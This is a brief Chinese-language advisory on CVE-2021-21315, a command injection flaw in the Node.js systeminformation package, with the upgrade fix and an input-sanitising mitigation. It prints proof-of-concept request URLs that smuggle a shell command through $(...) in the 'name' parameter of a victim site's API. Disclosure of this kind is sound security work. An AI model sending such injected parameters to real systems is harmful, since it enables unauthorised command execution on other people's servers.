Node.js命令注入漏洞（CVE-2021-21315-POC）

Node.js库中的systeminformation软件包中存在一个命令注入漏洞（CVE-2021-21315）攻击者可以通过「systeminformation」中代码注入漏洞的存在意味着攻击者可以通过在组件使用的未初始化参数内小心翼翼地注入有效载荷来执行系统命令。

POC:

[PoC][Victim Site]/api/getServices?name=$(echo -e 'Sekurak' > pwn.txt)[Victim Site]/api/getServices?name[]=$(echo -e 'Sekurak' > pwn.txt)

目前该漏洞已经修复，将systeminformation及时升级到5.3.1或更高版本。

https://www.npmjs.com/package/systeminformation

缓解措施

如果无法升级，可以检查或清理传递给si.inetLatency()、si.inetChecksite()、si.services()、si.processLoad()的参数，只允许使用string，拒绝任何数组。